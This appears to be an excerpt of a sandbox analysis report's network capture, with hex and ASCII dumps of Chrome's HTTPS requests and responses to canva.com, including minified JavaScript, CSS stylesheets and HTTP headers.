                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 2c 7a 24 61 2c 41 24 61 2c 42 24 61 2c 43 4c 2c 45 24 61 2c 46 24 61 2c 47 24 61 2c 49 24 61 2c 4a 24 61 2c 4b 24 61 2c 44 4c 2c 45 4c 2c 47 4c 2c 4e 24 61 2c 4f 24 61 2c 50 24 61 2c 51 24 61 2c 48 4c 2c 53 24 61 2c 54 24 61 2c 55 24 61 2c 57 24 61 2c 59 24 61 2c 56 24 61 2c 0a 4b 4c 2c 58 24 61 2c 5a 24 61 2c 63 61 62 2c 61 61 62 2c 65 61 62 2c 6b 61 62 2c 6c 61 62 2c 6a 61 62 2c 67 61 62 2c 6d 61 62 2c 66 61 62 2c 68 61 62 2c 69 61 62 2c 7a 61 62 2c 41 61 62 2c 44 61 62 2c 58 4c 2c 46 61 62 2c 59 4c 2c 5a 4c 2c 47 61 62 2c 48 61 62 2c 49 61 62 2c 4a 61 62 2c 24 4c 2c 4b 61 62 2c 62 4d 2c 63 4d 2c 4c 61 62 2c 4d 61 62 2c 4f 61 62 2c 50 61 62 2c 52 61 62 2c 51 61 62 2c 53 61 62 2c 54 61 62 2c 56 61 62 2c 59 61 62 2c 65 4d 2c 62 62 62 2c 6a 62 62 2c 64 62
                                                                                                                                                                                                                                                                    Data Ascii: ,z$a,A$a,B$a,CL,E$a,F$a,G$a,I$a,J$a,K$a,DL,EL,GL,N$a,O$a,P$a,Q$a,HL,S$a,T$a,U$a,W$a,Y$a,V$a,KL,X$a,Z$a,cab,aab,eab,kab,lab,jab,gab,mab,fab,hab,iab,zab,Aab,Dab,XL,Fab,YL,ZL,Gab,Hab,Iab,Jab,$L,Kab,bM,cM,Lab,Mab,Oab,Pab,Rab,Qab,Sab,Tab,Vab,Yab,eM,bbb,jbb,db
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 62 2c 51 68 62 2c 48 68 62 2c 56 68 62 2c 52 68 62 2c 4d 68 62 2c 6a 50 2c 6e 50 2c 57 68 62 2c 4e 68 62 2c 54 68 62 2c 58 68 62 2c 5a 68 62 2c 61 69 62 2c 6f 50 2c 5a 4d 2c 63 69 62 2c 64 69 62 2c 62 69 62 2c 6f 69 62 2c 6b 69 62 2c 72 69 62 2c 71 69 62 2c 70 69 62 2c 73 69 62 2c 74 69 62 2c 75 69 62 2c 77 69 62 2c 78 69 62 2c 79 69 62 2c 70 50 2c 42 69 62 2c 43 69 62 2c 45 69 62 2c 7a 69 62 2c 46 69 62 2c 47 69 62 2c 41 69 62 2c 4d 69 62 2c 4f 69 62 2c 71 50 2c 51 69 62 2c 4e 69 62 2c 52 69 62 2c 53 69 62 2c 55 69 62 2c 56 69 62 2c 57 69 62 2c 5a 69 62 2c 63 6a 62 2c 65 6a 62 2c 24 69 62 2c 61 6a 62 2c 62 6a 62 2c 64 6a 62 2c 69 6a 62 2c 6a 6a 62 2c 6e 6a 62 2c 70 6a 62 2c 72 6a 62 2c 75 50 2c 0a 76 6a 62 2c 75 6a 62 2c 77 6a 62 2c 78 6a 62 2c 79 6a 62
                                                                                                                                                                                                                                                                    Data Ascii: b,Qhb,Hhb,Vhb,Rhb,Mhb,jP,nP,Whb,Nhb,Thb,Xhb,Zhb,aib,oP,ZM,cib,dib,bib,oib,kib,rib,qib,pib,sib,tib,uib,wib,xib,yib,pP,Bib,Cib,Eib,zib,Fib,Gib,Aib,Mib,Oib,qP,Qib,Nib,Rib,Sib,Uib,Vib,Wib,Zib,cjb,ejb,$ib,ajb,bjb,djb,ijb,jjb,njb,pjb,rjb,uP,vjb,ujb,wjb,xjb,yjb
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 2c 65 70 62 2c 66 70 62 2c 67 70 62 2c 69 70 62 2c 68 70 62 2c 6a 70 62 2c 6b 70 62 2c 6d 70 62 2c 6c 70 62 2c 6e 70 62 2c 72 70 62 2c 73 70 62 2c 76 70 62 2c 78 70 62 2c 79 70 62 2c 7a 70 62 2c 41 70 62 2c 42 70 62 2c 44 70 62 2c 47 70 62 2c 49 70 62 2c 48 70 62 2c 4e 70 62 2c 51 70 62 2c 52 70 62 2c 4f 70 62 2c 50 70 62 2c 54 70 62 2c 55 70 62 2c 59 70 62 2c 66 53 2c 5a 70 62 2c 61 71 62 2c 62 71 62 2c 63 71 62 2c 64 71 62 2c 65 71 62 2c 6a 71 62 2c 68 71 62 2c 66 71 62 2c 67 71 62 2c 69 71 62 2c 6b 71 62 2c 69 53 2c 6d 71 62 2c 6c 71 62 2c 6b 53 2c 6c 53 2c 6d 53 2c 6f 71 62 2c 71 71 62 2c 72 71 62 2c 6e 53 2c 73 71 62 2c 74 71 62 2c 75 71 62 2c 76 71 62 2c 77 71 62 2c 78 71 62 2c 79 71 62 2c 70 53 2c 7a 71 62 2c 41 71 62 2c 44 71 62 2c 42 71 62 2c 43
                                                                                                                                                                                                                                                                    Data Ascii: ,epb,fpb,gpb,ipb,hpb,jpb,kpb,mpb,lpb,npb,rpb,spb,vpb,xpb,ypb,zpb,Apb,Bpb,Dpb,Gpb,Ipb,Hpb,Npb,Qpb,Rpb,Opb,Ppb,Tpb,Upb,Ypb,fS,Zpb,aqb,bqb,cqb,dqb,eqb,jqb,hqb,fqb,gqb,iqb,kqb,iS,mqb,lqb,kS,lS,mS,oqb,qqb,rqb,nS,sqb,tqb,uqb,vqb,wqb,xqb,yqb,pS,zqb,Aqb,Dqb,Bqb,C
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 78 62 2c 6d 78 62 2c 65 78 62 2c 78 78 62 2c 0a 45 78 62 2c 50 78 62 2c 52 78 62 2c 56 78 62 2c 57 78 62 2c 62 79 62 2c 64 79 62 2c 63 79 62 2c 66 79 62 2c 67 79 62 2c 68 79 62 2c 69 79 62 2c 6a 79 62 2c 6b 79 62 2c 6d 79 62 2c 6f 79 62 2c 70 79 62 2c 71 79 62 2c 72 79 62 2c 75 79 62 2c 74 79 62 2c 77 79 62 2c 42 79 62 2c 78 79 62 2c 44 79 62 2c 43 79 62 2c 46 79 62 2c 45 79 62 2c 47 79 62 2c 48 79 62 2c 49 79 62 2c 4a 79 62 2c 71 7a 62 2c 72 7a 62 2c 74 7a 62 2c 75 7a 62 2c 73 7a 62 2c 77 7a 62 2c 78 7a 62 2c 76 7a 62 2c 79 7a 62 2c 49 7a 62 2c 4a 7a 62 2c 4c 7a 62 2c 4b 7a 62 2c 76 73 62 2c 4d 7a 62 2c 4e 7a 62 2c 68 56 2c 50 7a 62 2c 52 7a 62 2c 53 7a 62 2c 64 74 62 2c 55 7a 62 2c 57 7a 62 2c 58 7a 62 2c 5a 7a 62 2c 24 7a 62 2c 61 41 62 2c 62 41 62 2c
                                                                                                                                                                                                                                                                    Data Ascii: xb,mxb,exb,xxb,Exb,Pxb,Rxb,Vxb,Wxb,byb,dyb,cyb,fyb,gyb,hyb,iyb,jyb,kyb,myb,oyb,pyb,qyb,ryb,uyb,tyb,wyb,Byb,xyb,Dyb,Cyb,Fyb,Eyb,Gyb,Hyb,Iyb,Jyb,qzb,rzb,tzb,uzb,szb,wzb,xzb,vzb,yzb,Izb,Jzb,Lzb,Kzb,vsb,Mzb,Nzb,hV,Pzb,Rzb,Szb,dtb,Uzb,Wzb,Xzb,Zzb,$zb,aAb,bAb,
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 79 28 28 29 3d 3e 67 2e 65 6e 64 28 29 29 7d 3b 7a 38 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 63 6f 6e 73 74 20 65 3d 61 2e 75 48 28 63 29 3b 5b 2e 2e 2e 61 2e 48 53 5d 2e 66 69 6c 74 65 72 28 65 29 2e 66 6f 72 45 61 63 68 28 66 3d 3e 62 5b 66 5d 2e 61 64 64 28 64 5b 66 5d 29 29 3b 45 70 28 61 2c 64 2c 66 3d 3e 61 2e 51 65 61 28 66 29 26 26 65 28 66 29 2c 28 66 2c 67 29 3d 3e 62 5b 67 5d 2e 61 64 64 28 66 29 29 7d 3b 0a 41 38 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 63 6f 6e 73 74 20 65 3d 61 2e 75 68 2c 66 3d 61 2e 75 48 28 63 29 3b 76 61 72 20 67 3b 5b 2e 2e 2e 61 2e 48 53 5d 2e 66 69 6c 74 65 72 28 66 29 2e 66 6f 72 45 61 63 68 28 68 3d 3e 62 5b 68 5d 2e 61 64 64 28 6e 75 6c 6c 21 3d 3d 28 67 3d 64 5b 68 5d 29 26
                                                                                                                                                                                                                                                                    Data Ascii: y(()=>g.end())};z8a=function(a,b,c,d){const e=a.uH(c);[...a.HS].filter(e).forEach(f=>b[f].add(d[f]));Ep(a,d,f=>a.Qea(f)&&e(f),(f,g)=>b[g].add(f))};A8a=function(a,b,c,d){const e=a.uh,f=a.uH(c);var g;[...a.HS].filter(f).forEach(h=>b[h].add(null!==(g=d[h])&
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 6e 28 61 2c 62 2c 63 29 7b 62 3d 64 41 2e 74 72 61 6e 73 6c 61 74 65 28 2d 62 2e 78 2c 2d 62 2e 79 29 2e 74 68 65 6e 28 66 41 28 2d 61 2e 72 6f 74 61 74 69 6f 6e 2a 72 41 2f 31 38 30 29 29 3b 76 61 72 20 64 3d 61 2e 62 72 3b 63 6f 6e 73 74 20 5b 65 2c 66 5d 3d 5b 62 2e 74 72 61 6e 73 66 6f 72 6d 50 6f 69 6e 74 28 61 2e 74 6c 29 2c 62 2e 74 72 61 6e 73 66 6f 72 6d 50 6f 69 6e 74 28 64 29 5d 3b 61 3d 4c 4b 28 65 2e 78 29 3b 64 3d 4c 4b 28 65 2e 79 29 3b 63 6f 6e 73 74 20 67 3d 4c 4b 28 66 2e 78 29 2c 68 3d 4c 4b 28 66 2e 79 29 3b 74 28 30 3e 3d 61 2c 22 73 63 61 6c 65 20 6f 72 69 67 69 6e 20 69 73 20 6f 75 74 73 69 64 65 20 62 6f 78 3a 20 7b 7d 22 2c 61 29 3b 74 28 30 3e 3d 64 2c 22 73 63 61 6c 65 20 6f 72 69 67 69 6e 20 69 73 20 6f 75 74 73 69 64 65 20 62
                                                                                                                                                                                                                                                                    Data Ascii: n(a,b,c){b=dA.translate(-b.x,-b.y).then(fA(-a.rotation*rA/180));var d=a.br;const [e,f]=[b.transformPoint(a.tl),b.transformPoint(d)];a=LK(e.x);d=LK(e.y);const g=LK(f.x),h=LK(f.y);t(0>=a,"scale origin is outside box: {}",a);t(0>=d,"scale origin is outside b


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    71192.168.2.1249795104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:44 UTC923OUTGET /chunk-batch/0009a6e8ae11a411.ltr.css+b9997efbfcc9862a.ltr.css+4217645fff8006fa.ltr.css+44120d0e86f58fdd.ltr.css+70f83d7290d33057.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                                    Host: chunk-composing.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1139INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:45 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                    Content-Length: 9332
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59512c5f9a430e-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 650612
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:31 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Tue, 05 Nov 2024 01:22:11 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    Timing-Allow-Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Thu, 06 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: BH1rJdVX+wEjWTP6xTrrASjwXtieXOTY1+5zuIXCsPKwPOKIb6XiHx7kMCYG9Lh1/2MFK9UZiCo=
                                                                                                                                                                                                                                                                    x-amz-replication-status: PENDING
                                                                                                                                                                                                                                                                    x-amz-request-id: 4JG09YNH0B77NCZQ
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: tXXfgK67eRd22.se3Wi.VqwHLpWi2Wa4
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC364INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 48 7a 59 70 56 45 54 4e 51 45 55 55 4a 35 25 32 42 53 58 43 47 36 4d 4b 6a 67 63 4c 70 75 44 66 71 33 64 6d 6c 49 6c 36 75 63 75 44 51 67 6c 36 31 56 49 76 52 35 72 62 68 6c 76 39 62 4d 6a 35 50 68 4c 4f 41 4e 44 70 5a 6b 25 32 42 39 68 25 32 42 6c 47 48 4a 53 65 71 68 69 6b 6a 4f 6a 54 25 32 46 70 41 38 4f 6a 6b 45 31 78 54 67 49 70 59 59 77 4c 44 45 39 4c 44 7a 58 6e 65 62 35 79 6b 6d 30 79 37 68 49 73 69 6c 46 66 7a 77 5a 4c 72 4f 4e 6b 78 57 4d 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HzYpVETNQEUUJ5%2BSXCG6MKjgcLpuDfq3dmlIl6ucuDQgl61VIvR5rbhlv9bMj5PhLOANDpZk%2B9h%2BlGHJSeqhikjOjT%2FpA8OjkE1xTgIpYYwLDE9LDzXneb5ykm0y7hIsilFfzwZLrONkxWM%3D"}],"group":"cf-nel","m
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1235INData Raw: 2f 2a 20 5f 5f 46 49 4c 45 5f 43 4f 4e 54 45 4e 54 5f 46 4f 52 5f 5f 3a 30 30 30 39 61 36 65 38 61 65 31 31 61 34 31 31 2e 6c 74 72 2e 63 73 73 20 2a 2f 0a 2e 6e 4d 76 56 71 41 7b 64 69 73 70 6c 61 79 3a 67 72 69 64 3b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 61 72 65 61 73 3a 22 63 6f 72 6e 65 72 2d 62 6c 6f 63 6b 20 68 6f 72 69 7a 6f 6e 74 61 6c 2d 68 65 61 64 65 72 73 22 20 22 76 65 72 74 69 63 61 6c 2d 68 65 61 64 65 72 73 20 73 68 65 65 74 22 3b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6c 75 6d 6e 73 3a 61 75 74 6f 20 31 66 72 3b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 72 6f 77 73 3a 61 75 74 6f 20 31 66 72 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6e 4d 76 56 71 41 2e 48 32 77 79 6b 77 7b 64 69 72 65 63 74 69 6f 6e 3a 6c
                                                                                                                                                                                                                                                                    Data Ascii: /* __FILE_CONTENT_FOR__:0009a6e8ae11a411.ltr.css */.nMvVqA{display:grid;grid-template-areas:"corner-block horizontal-headers" "vertical-headers sheet";grid-template-columns:auto 1fr;grid-template-rows:auto 1fr;position:relative}.nMvVqA.H2wykw{direction:l
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 2d 2d 65 47 56 62 6e 67 29 7d 2e 6f 59 6c 68 58 41 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 64 31 70 39 39 77 29 7d 2e 64 32 75 4c 49 41 7b 62 6f 72 64 65 72 2d 62 6c 6f 63 6b 2d 65 6e 64 3a 2e 35 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 62 6f 72 64 65 72 2d 62 6c 6f 63 6b 2d 73 74 61 72 74 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 62 6f 72 64 65 72 2d 69 6e 6c 69 6e 65 3a 2e 35 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 7d 2e 4a 68 42 7a 79 77 7b 62 6f 72 64 65 72 2d 62 6c 6f 63 6b 3a 2e 35 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 62 6f 72 64 65 72 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 2e 35 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 62 6f 72 64 65 72 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 31 70 78 20 73 6f
                                                                                                                                                                                                                                                                    Data Ascii: --eGVbng)}.oYlhXA{color:var(--d1p99w)}.d2uLIA{border-block-end:.5px solid #d9d9d9;border-block-start:1px solid #d9d9d9;border-inline:.5px solid #d9d9d9}.JhBzyw{border-block:.5px solid #d9d9d9;border-inline-end:.5px solid #d9d9d9;border-inline-start:1px so
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 29 3b 67 72 69 64 2d 61 72 65 61 3a 76 65 72 74 69 63 61 6c 2d 68 65 61 64 65 72 73 7d 2e 56 44 46 76 5f 41 7b 67 72 69 64 2d 61 72 65 61 3a 73 68 65 65 74 3b 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 33 32 70 78 29 3b 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 33 32 70 78 29 7d 2e 63 36 61 31 65 51 7b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 7d 2e 63 36 61 31 65 51 2e 48 5f 43 74 49 51 7b 6c 65 66 74 3a 30 7d 2e 63 36 61 31 65 51 2e 5f 38 5f 35 36 50 51 7b 72 69 67 68 74 3a 30 7d 0a 2f 2a 20 5f 5f 46 49 4c 45 5f 43 4f 4e 54 45 4e 54 5f 46 4f 52 5f 5f 3a 62 39 39 39 37 65 66 62 66 63 63 39 38 36 32 61 2e 6c 74 72 2e 63 73 73 20 2a 2f 0a 2e 46
                                                                                                                                                                                                                                                                    Data Ascii: );grid-area:vertical-headers}.VDFv_A{grid-area:sheet;height:calc(100% - 32px);width:calc(100% - 32px)}.c6a1eQ{pointer-events:none;position:absolute;top:0}.c6a1eQ.H_CtIQ{left:0}.c6a1eQ._8_56PQ{right:0}/* __FILE_CONTENT_FOR__:b9997efbfcc9862a.ltr.css */.F
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 3a 31 66 72 7d 2e 58 65 6d 54 64 51 2e 45 64 65 77 4e 77 3a 6e 6f 74 28 2e 70 7a 58 79 55 41 29 3a 6e 6f 74 28 2e 5f 36 5a 70 50 72 77 29 2c 2e 58 65 6d 54 64 51 2e 5f 36 5a 70 50 72 77 3a 6e 6f 74 28 2e 70 7a 58 79 55 41 29 3a 6e 6f 74 28 2e 45 64 65 77 4e 77 29 7b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6c 75 6d 6e 73 3a 2e 39 65 6d 7d 2e 58 65 6d 54 64 51 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 65 6d 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 70 61 63 69 74 79 3a 2e 31 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 25 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 58
                                                                                                                                                                                                                                                                    Data Ascii: :1fr}.XemTdQ.EdewNw:not(.pzXyUA):not(._6ZpPrw),.XemTdQ._6ZpPrw:not(.pzXyUA):not(.EdewNw){grid-template-columns:.9em}.XemTdQ:before{background-color:currentColor;border-radius:2em;content:"";height:100%;opacity:.1;position:absolute;width:100%;z-index:-1}.X
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 6e 73 6c 61 74 65 59 28 30 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 5f 31 5f 6c 4b 37 51 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 30 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 31 36 70 78 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 57 55 5f 36 5f 41 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 30 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 31 36 70 78 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6c 52 68 63 73 77 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 31 36 70 78 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6a
                                                                                                                                                                                                                                                                    Data Ascii: nslateY(0)}}@keyframes _1_lK7Q{0%{transform:translateX(0)}to{transform:translateX(16px)}}@keyframes WU_6_A{0%{transform:translateX(0)}to{transform:translateX(-16px)}}@keyframes lRhcsw{0%{transform:translateY(0)}to{transform:translateY(-16px)}}@keyframes j
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 6f 74 74 6f 6d 3a 38 70 78 7d 2e 6f 55 42 55 49 51 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 75 37 62 37 6b 51 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 68 65 69 67 68 74 3a 32 34 70 78 7d 2e 41 5f 4d 67 53 77 7b 66 6c 65 78 3a 31 20 31 20 61 75 74 6f 7d 2e 41 6f 6e 77 58 77 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 65 6e 64 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 2d 72 65 76 65 72 73 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 36 70 78 7d 2e 78 64 4c 48 55 41 7b 6d 61 72 67 69 6e 3a 30 20 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 20 31 36 70 78 7d
                                                                                                                                                                                                                                                                    Data Ascii: ottom:8px}.oUBUIQ{display:flex;justify-content:space-between}.u7b7kQ{align-items:center;display:flex;height:24px}.A_MgSw{flex:1 1 auto}.AonwXw{align-self:flex-end;display:flex;flex-direction:row-reverse;margin-top:16px}.xdLHUA{margin:0 8px;padding:0 16px}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1252INData Raw: 65 72 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 2e 34 29 7d 7d 2e 4d 30 79 6c 70 51 3a 61 63 74 69 76 65 20 2e 5f 37 52 4f 70 76 77 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 38 29 7d 2e 5f 37 52 4f 70 76 77 7b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 63 65 6e 74 65 72 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 2e 34 73 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 74 72 61 6e 73 66 6f 72 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 7d 2e 44 73 6f 70 69 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 4e 4b 62 4d 69 77 7b 62 6f 74 74 6f 6d 3a 2d 31 32 70 78 3b
                                                                                                                                                                                                                                                                    Data Ascii: er{transform:scale(1.4)}}.M0ylpQ:active ._7ROpvw{transform:scale(.8)}._7ROpvw{transform-origin:center;transition-duration:.4s;transition-property:transform;transition-timing-function:ease}.Dsopig{display:inline-flex;position:relative}.NKbMiw{bottom:-12px;


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    72192.168.2.1249796104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:44 UTC1260OUTGET /cdn-cgi/challenge-platform/h/b/scripts/jsd/22755d9a86c9/main.js? HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
